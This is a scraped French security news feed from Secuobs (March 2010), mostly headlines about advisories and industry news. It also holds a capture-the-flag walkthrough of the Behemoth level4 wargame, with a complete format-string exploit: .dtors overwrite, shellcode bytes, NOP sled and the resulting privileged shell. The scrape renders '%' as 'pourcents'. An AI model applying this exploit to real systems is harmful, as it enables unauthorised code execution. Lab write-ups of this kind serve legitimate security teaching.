Ipanema Technologies Il comptera sur les compétences de l'équipe technique et sur les remontées de projets de l'équipe sédentaire, pour - Business http://www.secuobs.com/revue/news/198862.shtmlhttp://www.secuobs.com/revue/news/198862.shtml Secuobs.com : 2010-03-05 20:40:33 - Les derniers documents du CERTA. - CERTA-2010-ACT-009 http://www.secuobs.com/revue/news/198761.shtmlhttp://www.secuobs.com/revue/news/198761.shtml Secuobs.com : 2010-03-05 20:40:33 - Les derniers documents du CERTA. - De multiples vulnérabilités dans CA SiteMinder permettent de réaliser des injections de code indirectes http://www.secuobs.com/revue/news/198760.shtmlhttp://www.secuobs.com/revue/news/198760.shtml Secuobs.com : 2010-03-05 20:40:33 - Les derniers documents du CERTA. - De multiples vulnérabilités dans Drupal permettent de réaliser des injections de code indirectes et de contourner la politique de sécurité http://www.secuobs.com/revue/news/198759.shtmlhttp://www.secuobs.com/revue/news/198759.shtml Secuobs.com : 2010-03-05 20:40:33 - Les derniers documents du CERTA. - Une injection de code indirecte existe dans des équipements Juniper IVE http://www.secuobs.com/revue/news/198758.shtmlhttp://www.secuobs.com/revue/news/198758.shtml Secuobs.com : 2010-03-05 20:40:33 - Les derniers documents du CERTA. - Une vulnérabilité dans CUPS permet une élévation de privilèges http://www.secuobs.com/revue/news/198757.shtmlhttp://www.secuobs.com/revue/news/198757.shtml Secuobs.com : 2010-03-05 20:40:33 - Les derniers documents du CERTA. - Une vulnérabilité dans un module tiers intégré dans certains produits Symantec, et concernant le traitement des documents utilisant la technologie OLE a été corrigée, et le module a été mis à jour http://www.secuobs.com/revue/news/198756.shtmlhttp://www.secuobs.com/revue/news/198756.shtml Secuobs.com : 2010-03-05 19:36:37 - Comme dans du beurre - Au moins on ne pourra nous reprocher d'avoir de l'humour Bonne fin de semaine http://www.secuobs.com/revue/news/198732.shtmlhttp://www.secuobs.com/revue/news/198732.shtml Secuobs.com : 2010-03-05 19:35:47 - Journal du Net Solutions l'actualité en bref - Le fournisseur de solutions de sécurité a lancé sa nouvelle gamme de points d'accès FortiAP Articulée autour des boîtiers F http://www.secuobs.com/revue/news/198731.shtmlhttp://www.secuobs.com/revue/news/198731.shtml Secuobs.com : 2010-03-05 19:00:46 - L'Atelier.fr Toute l'actualité - Le site officiel exploite YouTube, Twitter, et propose un contenu très divers Le but était d'utiliser les technologies comme moyen d'accéder au plus grand nombre d'individus citoyens, analystes, entreprises, médias IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/198725.shtmlhttp://www.secuobs.com/revue/news/198725.shtml Secuobs.com : 2010-03-05 17:55:32 - L'Atelier.fr Toute l'actualité - Smart Hip, intégré aux implants de la hanche, est composé d'un réseau de capteurs qui mesurent la réception de la prothèse par le corps Les informations sont envoyées par Bluetooth à une base de données IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/198705.shtmlhttp://www.secuobs.com/revue/news/198705.shtml Secuobs.com : 2010-03-05 17:55:32 - L'Atelier.fr Toute l'actualité - Difficile pour une entreprise de choisir le modèle de smartphone qui lui permettra de faire tourner les applications métiers utiles à son activité Les interfaces de développement universelles sont une solution IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/198704.shtmlhttp://www.secuobs.com/revue/news/198704.shtml Secuobs.com : 2010-03-05 17:03:06 - CNIS mag - Zeljka Zorz, du HNS, fait un rapide tour d horizon de la biométrie Un court voyage de quelques dizaines de lignes qui résume de manière lapidaire les limitations de ce procédé d authentification et qui, surtout montre à quel point la notion d intégration d une technologie est un problème bien distinct des principes qui régissent la technologie elle-même http://www.secuobs.com/revue/news/198688.shtmlhttp://www.secuobs.com/revue/news/198688.shtml Secuobs.com : 2010-03-05 17:03:06 - CNIS mag - Imperva,un spécialiste de la sécurité des bases de données, est un habitué des études thématiques détaillant l organisation quasi-militaire des cybercriminels La dernière étude en date, disponible gratuitement moyennant une impressionnante quantité d informations personnelles nous décrit un monde où les truands sont plus organisés qu une entreprise aéronautique Organisés et sachant se diversifier, car http://www.secuobs.com/revue/news/198687.shtmlhttp://www.secuobs.com/revue/news/198687.shtml Secuobs.com : 2010-03-05 16:47:52 - Ma petite parcelle d'Internet... - L a semaine dernière, Martin Beck a annoncé des améliorations à l'attaque sur TKIP qu'il avait publiée avec Éric Tews fin 2008 Dans son papier intitulé Enhanced TKIP Michael Attacks , il décrit d'abord une méthode permettant de récupérer des keystreams plus longs puis une attaque sur le MIC Michael permettant de modifier le début d'une trame chiffrée Du travail qui fournit manifestement de bons résultats, scénarios d'exploitation à la clé, mais sous des conditions qui risquent fort de rendre ces attaques fort difficiles à réaliser puisqu'elles sont encore plus drastiques que celles nécessaires à la bonne réalisation de l'attaque originale http://www.secuobs.com/revue/news/198686.shtmlhttp://www.secuobs.com/revue/news/198686.shtml Secuobs.com : 2010-03-05 15:31:13 - Ma petite parcelle d'Internet... - L a semaine dernière, Martin Beck a annoncé des améliorations à l'attaque sur TKIP qu'il avait publiée avec Éric Tews fin 2008 Dans son papier intitulé Enhanced TKIP Michael Attacks , il décrit d'abord une méthode permettant de récupérer des keystreams plus longs puis une attaque sur le MIC Michael permettant de modifier le début d'une trame chiffrée Du travail qui fournit manifestement de bons résultats, scénarios d'exploitation à la clé, mais sous des conditions qui risquent fort de rendre ces attaques fort difficiles à réaliser puisqu'elles sont encore plus drastiques que celles nécessaires à la bonne réalisation de l'attaque originale http://www.secuobs.com/revue/news/198672.shtmlhttp://www.secuobs.com/revue/news/198672.shtml Secuobs.com : 2010-03-05 15:26:35 - L'Atelier.fr Toute l'actualité - En prenant en compte plusieurs critères d'un papier, le système balaie différentes sources pour trouver des informations liées au sujet initial Il présente ensuite les paragraphes contenant ce supplément de données IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/198668.shtmlhttp://www.secuobs.com/revue/news/198668.shtml Secuobs.com : 2010-03-05 14:26:41 - Plastic Soup Taste - Behemoth level4 Intrudednet behemothintrudednet 10103 user level4 pass Shai N9b level4 behemoth cd wargame level4 behemoth wargame level4 Identify yourself 5m0k3 Welcome, 5m0k3 Voyons si un Bof est possible level4 behemoth wargame python -c print 'A' 512 level4 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA level4 behemoth wargame Non Peut etre une format string level4 behemoth wargame python -c print 'pourcents08xpourcents08xpourcents08xpourcents08x' level4 Identify yourself Welcome, 000000c8b7fe0300b7eb634cb7ebea1c Ok, regardons donc le binaire de plus près level4 behemoth wargame gdb level4 0x080483f4 push pourcents ebp 0x080483f5 mov pourcents esp , pourcents ebp 0x080483f7 sub 0xe8 , pourcents esp 0x080483fd and 0xfffffff0 , pourcents esp 0x08048400 mov 0x0 , pourcents eax 0x08048405 add 0xf , pourcents eax 0x08048408 add 0xf , pourcents eax 0x0804840b shr 0x4 , pourcents eax 0x0804840e shl 0x4 , pourcents eax 0x08048411 sub pourcents eax , pourcents esp 0x08048413 movl 0x3ed , pourcents esp 0x0804841a call 0x80482ec setuid 1005 La il nous mache un peu le travail 0x0804841f movl 0x8048568 , pourcents esp 0x08048426 call 0x804831c printf Identify yourself 0x0804842b mov 0x8049698 , pourcents eax 0x08048430 mov pourcents eax , 0x8 pourcents esp 0x08048434 movl 0xc8 , 0x4 pourcents esp 0x0804843c lea 0xffffff28 pourcents ebp , pourcents eax 0x08048442 mov pourcents eax , pourcents esp 0x08048445 call 0x80482fc fgets pour saisir le nom 0x0804844a movl 0x804857c , pourcents esp 0x08048451 call 0x804831c printf Welcome 0x08048456 lea 0xffffff28 pourcents ebp , pourcents eax 0x0804845c mov pourcents eax , pourcents esp 0x0804845f call 0x804831c printf nom mov 0x0 , pourcents eax 0x08048469 leave 0x0804846a ret On va maintenant explorer un peu la stack pour savoir a partir de quel argument on retombe sur le buffer qu'on controle Je vous invite a lire ceci si arrivé ici rien n'est clair pour vous http cryptostanfordedu cs155old cs155-spring08 papers formatstring-12pdf level4 behemoth wargame python -c print 'pourcents08xpourcents08xpourcents08xpourcents08xpourcents08xpourcents08xpourcents08xpourcents08xpourcents08xpourcents08x' level4 Identify yourself Welcome, 000000c8b7fe0300b7eb634cb7ebea1cb7ec3b6e0000000000000000783830253830252e30252e78 On voit donc qu'on atteind notre buffer a partir du 8eme argument car il contient nos pourcents08x Le but sera donc de réécrire un pointeur particulier, pointeur sur une fonction vers laquelle le programme sautera a un moment donné Tant qu'a faire, autant que cette fonction soit la notre p On décide ici de réécrire le pointeur dtor Destructeur de la fonction main , qui qera logiquement exécuté a la fin du programme Trouvons tout d'abord son adresse level4 behemoth wargame objdump -x level4grep dtor 16 dtors 00000008 08049594 08049594 00000594 2 2 08049594 l d dtors 00000000 dtors 08049594 l O dtors 00000000 __DTOR_LIST__ 08048390 l F text 00000000 __do_global_dtors_aux 08049598 l O dtors 00000000 __DTOR_END__ ICI Donc il faudra écrire a l'adresse 0x08049598 Pour faire simple, on va placer un shellcode dans le buffer et sauter dessus On a tout d'abord déterminer l'adresse de notre buffer a la sale, ensuite on vérifiera proprement level4 behemoth wargame gdb level4 gdb b main 118 Breakpoint 1 at 0x804846a donc on pose un breakpoint juste avant le ret de main gdb r Starting program wargame level4 Identify yourself AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Welcome, AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Breakpoint 1, 0x0804846a in main gdb x 256x esp-256 0xbffff91c 0x08048464 0xbffff940 0x000000c8 0xb7fe0300 0xbffff92c 0xb7eb634c 0xb7ebea1c 0xb7ec3b6e 0x00000000 0xbffff93c 0x00000000 0x41414141 0x41414141 0x41414141 0xbffff94c 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff95c 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff96c 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff97c 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff98c 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff99c 0x41414141 0x41414141 0x41414141 0x41414141 0xbffff9ac 0x41414141 0x41414141 0x00000a41 0x28000000 Et on tombe direct sur notre buffer rempli de 0x41 'A' dont l'adresse est 0xbffff940 Maintenant proprement Logiquement, juste avant printf nom , l'adresse de nom est posée sur la pile , donc esp contient un pointeur vers notre buffer gdb d Delete all breakpoints y or n y gdb b main 107 Breakpoint 2 at 0x804845f gdb r The program being debugged has been started already Start it from the beginning y or n y Starting program wargame level4 Identify yourself AAAA Breakpoint 2, 0x0804845f in main gdb x x esp 0xbffff920 0xbffff940 gdb x s 0xbffff940 0xbffff940 AAAA n Donc 0xbffff940 est bien l'adresse de notre buffer Mais on doit lui ajouter 8, sinon on ne tombera pas au bon endroit, vous comprendrez pourquoi dans quelques linges 0xbffff940 8 0xbffff948 C'est donc cette adresse que l'on va devoir écrire à 0x08049598 DTOR_END__ Pour les format string, on écrit l'adresse en 2 temps Le plus petit bloc en premier et le plus grand ensuite bfff 49151 base 10 f948 63816 base 10 Notre exploit aura donc la forme Pour rappel pourcentsn permet d'écrire le nombre de caractères déja affichés par printf à une adresse donéne en argument On utilise ici pourcentshn car on veut érire l'adresse en deux fois, on écrit donc 4 octets au lieu de 8 Référez vous au man printf pour d'infos dtor 2 dtor shellcode pourcents 49151 - 8 longueur shellode upourcents8 hn pourcents 63816- 49151 upourcents8 hn On va utiliser le shellcode classique suivant x6a x0b x58 x99 x52 x68 x2f x2f x73 x68 x68 x2f x62 x69 x6e x89 xe3 x52 x53 x89 xe1 xcd x80 Qui fait 23 de long Donc On affichera d'abord 49120 caractères Puis 63816-49151 14665 caractères x9a x95 x04 x08 x98 x95 x04 x08 x6a x0b x58 x99 x52 x68 x2f x2f x73 x68 x68 x2f x62 x69 x6e x89 xe3 x52 x53 x89 xe1 xcd x80 pourcents49120upourcents8 hn pourcents14665upourcents8 hn Vérifions ca sous gdb level4 behemoth wargame gdb level4 On pose un bp juste avant le ret de main gdb b main 118 Breakpoint 1 at 0x804846a On lance notre programme avec notre exploit en entrée merci Ivan pour le trick gdb r python -c print ' x9a x95 x04 x08' ' x98 x95 x04 x08' ' x6a x0b x58 x99 x52 x68 x2f x2f x73 x68 x68 x2f x62 x69 x6e x89 xe3 x52 x53 x89 xe1 xcd x80' 'pourcents49120upourcents8 hn' 'pourcents14665upourcents9 hn' 000000000003086877440 Breakpoint 1, 0x0804846a in main on regarde ce qu'il y a dans dorts gdb x x 0x08049598 0x8049598 0xbffff948 Yeah et maintenant on vérifie que 0xbffff948 pointe bien sur le début de notre shellcode gdb x x 0xbffff948 0xbffff948 0x99580b6a C'est bien le cas On ajoute un cat a la fin pour ne pas perdre notre shell a cause de python gdb r python -c print ' x9a x95 x04 x08' ' x98 x95 x04 x08' ' x6a x0b x58 x99 x52 x68 x2f x2f x73 x68 x68 x2f x62 x69 x6e x89 xe3 x52 x53 x89 xe1 xcd x80' 'pourcents49120upourcents8 hn' 'pourcents14665upourcents9 hn' cat 0003086877440 id uid 1004 level4 gid 1004 level4 groups 1004 level4 Cela a l'air de fonctionner, sauf qu'on est sous gdb donc pas de euid level5 On quitte gdb et on test for real level4 behemoth wargame python -c print ' x9a x95 x04 x08' ' x98 x95 x04 x08' ' x6a x0b x58 x99 x52 x68 x2f x2f x73 x68 x68 x2f x62 x69 x6e x89 xe3 x52 x53 x89 xe1 xcd x80' 'pourcents49120upourcents8 hn' 'pourcents14665upourcents9 hn' cat level4 000003086877440 id Illegal instruction Snif Je pense que c'est du au fait qu'on est plus dans un environnement de debug Donc il peut y avoir un petit décalage pour l'adresse de buffer Qu'a cela ne tienne, on va rajouter une dizaine de nops au début de notre shellcode Cependant notre chaine va grandir de 10, donc il faut en prendre compte dtor 2 dtor shellcode pourcents 49151 - 8 longueur shellode 10nop upourcents8 hn pourcents 63816- 49151 upourcents8 hn Donc On affichera d'abord 49110 caractères Puis 63816-49110 14706 caractères python -c print ' x9a x95 x04 x08' ' x98 x95 x04 x08' ' x90 x90 x90 x90 x90 x90 x90 x90 x90 x90' ' x6a x0b x58 x99 x52 x68 x2f x2f x73 x68 x68 x2f x62 x69 x6e x89 xe3 x52 x53 x89 xe1 xcd x80' 'pourcents49110upourcents8 hn' 'pourcents14706upourcents9 hn' cat level4 086877440 id uid 1004 level4 gid 1004 level4 euid 1005 level5 groups 1004 level4 cat home level5 passwd aeJ a z6 Crac boum http://www.secuobs.com/revue/news/198651.shtmlhttp://www.secuobs.com/revue/news/198651.shtml Secuobs.com : 2010-03-05 13:31:23 - L'Atelier.fr Toute l'actualité - En concentrant l'ensemble des alertes sécurité d'une entreprise et en les analysant, la solution rend plus aisée et rapide la prise de décision Une solution qui conviendra surtout aux sociétés de grande taille IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/198644.shtmlhttp://www.secuobs.com/revue/news/198644.shtml Secuobs.com : 2010-03-05 12:56:35 - Global Security Mag Online - P r o g ra m m e Institut des Risques Industriels Assurantiels et Financiers Présentation du CLUSIR Poitou-Charentes Présentation des risques sécurité sur la VoIP ToIP Sébastien Gioria Retour d'expérience du choix d'une solution Centrex G Y ROUPE Retour d'expérience du choix d'une solution interne En partenariat avec le C LU S I F Renseignements utiles Mardi 23 mars 2010 de 18 h à 19 h 30 au Pôle Universitaire de Niort Bâtiment J3 - Amphithéâtre Galucher - 11, rue Archimède - 79000 - ÉVÉNEMENTS http://www.secuobs.com/revue/news/198639.shtmlhttp://www.secuobs.com/revue/news/198639.shtml Secuobs.com : 2010-03-05 12:56:35 - Global Security Mag Online - Dans un climat économique changeant, les entreprises doivent désormais en permanence repenser leur modèle organisationnel et s'adapter aux attentes de leurs clients Dans ce contexte, force est de constater que l'entreprise sédentaire et mono site tend à disparaître au profit de l'entreprise multi-site, qui connecte à la fois collaborateurs et partenaires L'on assiste donc à une déconcentration des centres de décision agences régionales, etc Ce constat étant posé, il convient ensuite - Points de Vue http://www.secuobs.com/revue/news/198638.shtmlhttp://www.secuobs.com/revue/news/198638.shtml Secuobs.com : 2010-03-05 12:01:38 - Global Security Mag Online - WatchGuard Technologies a lancé lors de la conférence RSA et du salon CEBIT, WatchGuard XTM 2 Series, une nouvelle gamme d'appliances de sécurité multifonctions Adapté aux petites entreprises et aux succursales comptant jusqu'à 50 utilisateurs, la gamme WatchGuard XTM 2 Series offre une solution de sécurité our le réseau, les applications et les données dans une appliance Les appliances WatchGuard XTM 2 Series sont des concentrés de fonctionnalités dans un format compact, adapté aux PME et aux sites - Produits http://www.secuobs.com/revue/news/198351.shtmlhttp://www.secuobs.com/revue/news/198351.shtml Secuobs.com : 2010-03-05 12:01:38 - Global Security Mag Online - Dans le cadre de sa stratégie de développement et d'innovation continue, Mobilegov, créateur de l'ADN du Numérique , annonce la signature d'un partenariat commercial et technique avec la société suisse ID Quantique Ce partenariat s'inscrit dans la dynamique commerciale de Mobilegov initiée depuis le dernier trimestre 2009 et renforce les offres des deux sociétés tant sur le plan technique que sur le plan commercial Sur le plan technique d'une part, le partenariat entre Mobilegov France et ID Quantique - Produits http://www.secuobs.com/revue/news/198350.shtmlhttp://www.secuobs.com/revue/news/198350.shtml Secuobs.com : 2010-03-05 12:01:38 - Global Security Mag Online - Le mardi 2 mars, la Cour Constitutionnelle allemande a décidé qu'une loi sur la rétention des données basée sur une directive européenne, et considérée comme un élément clé de la lutte contre le terrorisme, était en désaccord avec la Constitution allemande PGP Corporation commente cette décision La loi de 2008, qui contraint les sociétés de télécommunications à conserver les données téléphone et Internet de tous les citoyens pour une période de 6 mois, a suscité la colère du public allemand avec plus de - Points de Vue http://www.secuobs.com/revue/news/198349.shtmlhttp://www.secuobs.com/revue/news/198349.shtml Secuobs.com : 2010-03-05 11:49:59 - Vigilance vulnérabilités publiques - Un attaquant, normalement bloqué par des ACLs, peut envoyer des messages SIP INVITE à Asterisk http://www.secuobs.com/revue/news/198342.shtmlhttp://www.secuobs.com/revue/news/198342.shtml Secuobs.com : 2010-03-05 11:38:29 - L'Atelier.fr Toute l'actualité - Pannes techniques, problèmes d'incompatibilité Une majorité de mobinautes dit rencontrer des problèmes au quotidien avec son appareil, sans savoir à qui les attribuer Pour se plaindre, elle investit les réseaux sociaux IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/198336.shtmlhttp://www.secuobs.com/revue/news/198336.shtml Secuobs.com : 2010-03-05 09:03:18 - Misc - Bibliographie Dossier 1 Communication électronique non sollicitée le SPAM 1 MUD http frwikipediaorg wiki Multi-user_dungeon 2 Monty Pythons http frwikipediaorg wiki Monty_Python 3 1er SPAM http wwwtempletonscom brad spamreacthtml msg 4 DEC http frwikipediaorg wiki DEC 5 Arpanet http frwikipediaorg wiki ARPANET 6 Canter et Siegel http enwikipediaorg wiki Laurence_Canter_and_Martha_Siegel 7 Usenet http frwikipediaorg wiki USENET 8 Spamalytic http wwwicsiberkeleyedu pubs 2008-ccs-spamalyticspdf 9 Scam http frwikipediaorg wiki Fraude_4-1-9 10 Filtrage port 25 http wwwmaawgorg sites maawg files news MAAWG_Gestionduport25_0511pdf 11 RFC http wwwietforg rfchtml 12 http://www.secuobs.com/revue/news/198303.shtmlhttp://www.secuobs.com/revue/news/198303.shtml Secuobs.com : 2010-03-05 09:03:18 - Misc - Aurora humanum est Petit résumé pour ceux ayant passé les derniers mois en retraite avec le Dalaï Lama un 0-day sur Internet Explorer a été utilisé pour compromettre Google et quelques autres Cet événement anodin m inspire quelques réflexions Je ne m étendrai pas sur l aspect 0-day, la faille ayant été rapportée à Microsoft depuis quelques mois http://www.secuobs.com/revue/news/198302.shtmlhttp://www.secuobs.com/revue/news/198302.shtml Secuobs.com : 2010-03-05 09:03:18 - Misc - Le tout nouveau Misc est disponible dès maintenant chez votre marchand de journaux et sur notre site marchand Où trouver MISC près de chez vous Entrez un code postal - Exploit Corner 04-06 Fasync use-after-free Malware Corner 09-13 ANALYSE DU VIRUSWIN32SALITY Pentest Corner 14-16 MAC OS X POUR LES PENTESTERS Pour visualiser le sommaire complet, voir ci-dessous Sommaire suite Dossier COMMENT SE PROTÉGER CONTRE LA http://www.secuobs.com/revue/news/198301.shtmlhttp://www.secuobs.com/revue/news/198301.shtml Secuobs.com : 2010-03-04 22:43:16 - Global Security Mag Online - Aujourd'hui, lors de la Conférence RSA 2010, Microsoft a souligné les avancées réalisées pour concrétiser sa vision Confiance de bout en bout Lors de son discours d'ouverture, Scott Charney, vice-président du groupe Informatique de confiance TrustworthyComputing chez Microsoft, a expliqué comment cette vision Confiance de bout en bout peut être appliquée au Cloud Computing, a détaillé l'avancement de son projet de méta-système d'identité basé sur des revendications Claims-based Identity - Points de Vue http://www.secuobs.com/revue/news/198161.shtmlhttp://www.secuobs.com/revue/news/198161.shtml Secuobs.com : 2010-03-04 21:37:43 - Global Security Mag Online - Update MS10-015 security update re-released with new detection logic Date 04 Mars 2010 Gravité Moyenne Description Microsoft a publié dans le cadre du Patch Tuesday de février le correctif MS10-015 corrigeant deux vulnérabilités du noyau de Windows À la suite à son installation, des utilisateurs se sont plaints de l'apparition d'écran bleu voir bulletin XMCO nº 1265972321 Microsoft, ainsi que des chercheurs travaillant pour différents éditeurs de solutions antivirus se sont rendu - Vulnérabilités http://www.secuobs.com/revue/news/198132.shtmlhttp://www.secuobs.com/revue/news/198132.shtml Secuobs.com : 2010-03-04 20:01:06 - Global Security Mag Online - Attention, la CAF est de nouveau victime de tentatives de phishing des pirates envoient de faux emails aux particuliers, mentionnant que la CAF leur doit 16182 Lorsque vous cliquez sur le lien, vous arrivez sur un faux site qui vous demande de saisir vos données personnelles et ensuite vos coordonnées bancaires Nous vous conseillons de ne pas cliquer sur le lien et de ne surtout pas saisir vos données confidentielles , commente David Grout, ingénieur avant vente spécialiste de la - Info Malwares http://www.secuobs.com/revue/news/198099.shtmlhttp://www.secuobs.com/revue/news/198099.shtml Secuobs.com : 2010-03-04 20:01:06 - Global Security Mag Online - Pour Stéphane Caunes, ingénieur système Application Networking Group chez Citrix Systems France, les contrôleurs de mise à disposition d'applications ADC ou Application Delivery Controller , technologie mature et éprouvée, détiennent les clés qui permettront de développer le formidable potentiel du cloud computing Alors que le cloud computing suscite encore un large enthousiasme, nombreux sont ceux qui commencent à voir apparaître des ombres au tableau Il ne s'agit ni plus ni moins que de la - Points de Vue http://www.secuobs.com/revue/news/198098.shtmlhttp://www.secuobs.com/revue/news/198098.shtml Secuobs.com : 2010-03-04 19:35:22 - L'Atelier.fr Toute l'actualité - L'université de Singapour propose un système qui crypte sur l'écran les informations sensibles en s'inspirant des codes-barres 2D Pour les déchiffrer, il faut visualiser la page sur son téléphone, en utilisant la caméra IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/198094.shtmlhttp://www.secuobs.com/revue/news/198094.shtml Secuobs.com : 2010-03-04 18:50:05 - Les derniers documents du CERTA. - De multiples vulnérabilités dans Cisco Unified Communications Manager permettent de réaliser un déni de service à distance http://www.secuobs.com/revue/news/198073.shtmlhttp://www.secuobs.com/revue/news/198073.shtml Secuobs.com : 2010-03-04 18:50:05 - Les derniers documents du CERTA. - Une vulnérabilité dans Cisco Digital Media Player permet une injection de données à distance http://www.secuobs.com/revue/news/198072.shtmlhttp://www.secuobs.com/revue/news/198072.shtml Secuobs.com : 2010-03-04 18:50:05 - Les derniers documents du CERTA. - Plusieurs vulnérabilités dans Cisco Digital Media Manager permettent à une personne malintentionnée de contourner la politique de sécurité, d'élever ses privilèges ou de porter atteinte à la confidentialité des données http://www.secuobs.com/revue/news/198071.shtmlhttp://www.secuobs.com/revue/news/198071.shtml Secuobs.com : 2010-03-04 18:50:05 - Les derniers documents du CERTA. - Plusieurs vulnérabilités découvertes dans les produits VMware peuvent être exploitées à distance par un utilisateur malintentionné afin de compromettre le système ou d'entraver son bon fonctionnement http://www.secuobs.com/revue/news/198070.shtmlhttp://www.secuobs.com/revue/news/198070.shtml Secuobs.com : 2010-03-04 18:26:58 - L'Atelier.fr Toute l'actualité - Le test d'un service de m-paiement à Bengalore a permis de constater un bon taux d'adoption et une croissance du volume des règlements Mais des améliorations doivent être apportées, au niveau de l'offre et de l'assistance IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/198067.shtmlhttp://www.secuobs.com/revue/news/198067.shtml Secuobs.com : 2010-03-04 17:48:14 - Global Security Mag Online - Symantec Corp annonce Symantec Data Insight, une nouvelle technologie permettant aux entreprises d'améliorer la gouvernance des données grâce à la visibilité sur la propriété et l'utilisation des données non structurées telles que les documents, feuilles de calcul et e-mails En termes de sécurité et de stockage, Data Insight constitue une innovation entièrement compatible avec la gamme de produits de Symantec, dans la mesure où elle offre aux entreprises une approche unifiée de la gouvernance des - Produits http://www.secuobs.com/revue/news/198055.shtmlhttp://www.secuobs.com/revue/news/198055.shtml Secuobs.com : 2010-03-04 16:36:14 - Global Security Mag Online - Exceliance dévoile la version 35 d'ALOHA, son appliance de répartition de charge et de haute disponibilité Dotée d'une nouvelle interface d'administration, ALOHA 35 s'enrichit d'outils de diagnostic réseau statistiques réseau, statistiques d'état des interfaces, vérification d'adresse IP, ou encore capture du trafic en temps réel Au total, une vingtaine d'outils sont accessibles directement depuis l'interface d'administration ALOHA 35 se dote également d'un nouveau module d'analyse des codes - Produits http://www.secuobs.com/revue/news/198034.shtmlhttp://www.secuobs.com/revue/news/198034.shtml Secuobs.com : 2010-03-04 16:24:55 - Vigilance vulnérabilités publiques - Lors de l'utilisation des cibles dist et distcheck de GNU M4, un attaquant local peut altérer un fichier http://www.secuobs.com/revue/news/198030.shtmlhttp://www.secuobs.com/revue/news/198030.shtml Secuobs.com : 2010-03-04 16:02:35 - L'Atelier.fr Toute l'actualité - Identifier les internautes à forte notoriété permet aux éditeurs de savoir quelles pages mettre en avant En diminuant notamment le temps d'affichage des pages les plus consultées IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/198029.shtmlhttp://www.secuobs.com/revue/news/198029.shtml Secuobs.com : 2010-03-04 15:42:53 - BUG BROTHER - Les premières victimes des dommages collatéraux entraînés par les scanners corporels sont deux femmes musulmanes, voilées, qui se sont vu refuser l entrée dans l avion qui devait les amener de Manchester à Islamabad, parce qu elles ont refusé d être scannées Alors qu en France le débat sur le port du voile est porté par l UMP, l association de défense des suite http://www.secuobs.com/revue/news/198020.shtmlhttp://www.secuobs.com/revue/news/198020.shtml Secuobs.com : 2010-03-04 14:17:46 - Global Security Mag Online - La Garde civile espagnole a arrêté trois hommes soupçonnés d'appartenir au réseau Mariposa, papillon en espagnol Mariposa a infecté des ordinateurs dans plus de 190 pays et la moitié des 1000 plus grandes sociétés au monde ont été affectées selon Panda Security qui a aidé la police espagnole dans son enquête et Defence Intelligence, au Canada Le virus était programmé pour collecter des données confidentielles dans les ordinateurs infectés et de les envoyer à un centre de commandement et de - Info Malwares http://www.secuobs.com/revue/news/198005.shtmlhttp://www.secuobs.com/revue/news/198005.shtml Secuobs.com : 2010-03-04 14:17:46 - Global Security Mag Online - Avec ses nouvelles baies HP StorageWorks P2000 G3 Modular Smart Array MSA et HP StorageWorks P4000 G2 technologie LeftHand , HP lance deux nouvelles solutions SAN convergentes, performantes et évolutives Ces deux solutions apportent plusieurs innovations qui permettent de répondre, de manière efficace, aux besoins des utilisateurs La baie HP StorageWorks P4000 G2 SAN, une solution idéale contre les pertes de données et les interruptions Avec la technologie LeftHand et le HP StorageWorks - Produits http://www.secuobs.com/revue/news/198004.shtmlhttp://www.secuobs.com/revue/news/198004.shtml Secuobs.com : 2010-03-04 13:48:05 - L'Atelier.fr Toute l'actualité - TripZipr s'apprête à déployer ses applications sur Amazon Web Services Une initiative qui illustre l'intérêt des petites entreprises pour les services informatiques distants pour accélérer leur croissance IMAGE IMAGE IMAGE IMAGE http://www.secuobs.com/revue/news/198000.shtmlhttp://www.secuobs.com/revue/news/198000.shtml Secuobs.com : 2010-03-04 13:01:37 - Global Security Mag Online - OTIKA distributeur à valeur ajoutée, expert en solutions de sécurité et optimisation réseau, annonce l'arrivée de Stéphane Davaudet au sein de l'équipe commerciale Expert depuis plus de trois ans dans le développement de marques à fort potentiel, telles que Juniper Networks et Trend Micro Stéphane Davaudet sera exclusivement dédié au développement de la marque Ipanema Technologies Il comptera sur les compétences de l'équipe technique et sur les remontées de projets de l'équipe sédentaire, pour - Business http://www.secuobs.com/revue/news/197994.shtmlhttp://www.secuobs.com/revue/news/197994.shtml Secuobs.com : 2010-03-04 13:01:37 - Global Security Mag Online - Websense Inc annonce la nomination de Frédéric Braut au poste de Directeur des Opérations France Il rejoint Websense dans le cadre d'une réorganisation de la région Europe du Sud et apporte une expérience de plus de quinze ans en termes de management au sein du secteur informatique, notamment dans le domaine de la sécurité et du logiciel Frédéric Braut sera responsable de la stratégie et du développement commercial visant à accompagner la croissance des activités de Websense en France Avant de - Business http://www.secuobs.com/revue/news/197993.shtmlhttp://www.secuobs.com/revue/news/197993.shtml Secuobs.com : 2010-03-04 12:56:13 - CNIS mag - C est pour la bonne cause clame Stephan Esser qui relance un month of PHP bug rebaptisé pour les besoins du politiquement correct month of PHP security Le principe est inchangé toute personne en possession d un bel exploit PHP est prié de communiquer le fruit de ses recherches au comité http://www.secuobs.com/revue/news/197991.shtmlhttp://www.secuobs.com/revue/news/197991.shtml Secuobs.com : 2010-03-04 12:56:13 - CNIS mag - Guide forensique à l attention des forces de l ordre titre Public Intelligence Ce sont là cinq documents prétendument à diffusion restreinte, qui expliquent dans les grandes lignes les particularités techniques de Windows 7 et de Vista susceptibles de poser quelques 